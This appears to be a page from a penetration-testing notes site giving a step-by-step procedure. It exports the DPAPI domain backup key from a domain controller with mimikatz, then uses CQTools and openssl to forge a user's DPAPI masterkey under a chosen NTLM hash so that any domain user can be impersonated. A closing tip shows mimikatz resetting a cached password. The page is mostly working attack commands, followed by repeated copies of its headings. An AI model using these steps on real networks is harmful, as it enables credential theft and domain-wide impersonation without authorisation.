DPAPI Domain Backup Key

Exporting DPAPI Domain Backup Key from a domain controller with mimikatz, and explaining how to recreate a user's masterkey (AKA Impersonate ANYONE within the domain)

Tools:

Mimikatz
CQTools https://github.com/BlackDiverX/cqtools

Requirements: System level access on the host

Steps:

1)

mimikatz.exe

2) Dump the DPAPI Domain Backup Key from DC

lsadump::backupkeys /system:localhost /export

3) Transfer the .pfx container, as well as some of the CQtools (CQDPAPIBlobSearcher.exe and CQMasterKeyAD.exe to target machine of your choice)

4) Finds the Masterkey, which shown as mkguid on results

CQDPAPIBlobSearcher.exe /d c:\users\USER\AppData\Roaming /r /o c:users\USER\Desktop\blob

5) Attacking machine:

openssl pkcs12 -in DMK.pfx -out temp.pem -nodes (Password is mimikatz because it was extracted with mimikatz from DC)

6) Attacking machine: (Use cqure as passphrase. We repacked the pfx using "cqure" as passphrase to make the cqtool work or else it will fail)

openssl pkcs12 -export -out DMK.pfx -in temp.pem

7)

CQMasterKeyAD.exe /file "c:\users\USER\appdata\roaming\microsoft\protect\USER_SID\MASTERKEY" /pfx DMK.pfx /newhash NTLM_HASH_OF_USER

8)

ren OLD_MASTERKEY_FILE WHATEVER

9)

ren NEW_MASTERKEY_FILE OLD_MASTERKEY_FILE

10) Shuffle the old and new masterkey files, then give the same attributes to the newly created masterkey file as the old one

attrib "c:\users\USER\appdata\roaming\microsoft\protect\USER_SID\MASTERKEY" +S +H

11) VOILA!

TIP: In case we cannot crack the NTLM password of a user, we can simply create a new password with mimikatz:

lsadump::cache /user:USER /password:NEW_PASSWORD /kiwi

PreviousDPAPI Backup Keys dumping NextGolden Ticket

Last updated 1 month ago

hashtagExporting DPAPI Domain Backup Key from a domain controller with mimikatz, and explaining how to recreate a user's masterkey (AKA Impersonate ANYONE within the domain)

hashtagRequirements: System level access on the host

hashtagSteps:

hashtag1)

hashtag2) Dump the DPAPI Domain Backup Key from DC

hashtag3) Transfer the .pfx container, as well as some of the CQtools (CQDPAPIBlobSearcher.exe and CQMasterKeyAD.exe to target machine of your choice)

hashtag4) Finds the Masterkey, which shown as mkguid on results

hashtag5) Attacking machine:

hashtag6) Attacking machine: (Use cqure as passphrase. We repacked the pfx using "cqure" as passphrase to make the cqtool work or else it will fail)

hashtag7)

hashtag8)

hashtag9)

hashtag10) Shuffle the old and new masterkey files, then give the same attributes to the newly created masterkey file as the old one

hashtag11) VOILA!

hashtagTIP: In case we cannot crack the NTLM password of a user, we can simply create a new password with mimikatz:

Exporting DPAPI Domain Backup Key from a domain controller with mimikatz, and explaining how to recreate a user's masterkey (AKA Impersonate ANYONE within the domain)

Requirements: System level access on the host

Steps:

1)

2) Dump the DPAPI Domain Backup Key from DC

3) Transfer the .pfx container, as well as some of the CQtools (CQDPAPIBlobSearcher.exe and CQMasterKeyAD.exe to target machine of your choice)

4) Finds the Masterkey, which shown as mkguid on results

5) Attacking machine:

6) Attacking machine: (Use cqure as passphrase. We repacked the pfx using "cqure" as passphrase to make the cqtool work or else it will fail)

7)

8)

9)

10) Shuffle the old and new masterkey files, then give the same attributes to the newly created masterkey file as the old one

11) VOILA!

TIP: In case we cannot crack the NTLM password of a user, we can simply create a new password with mimikatz: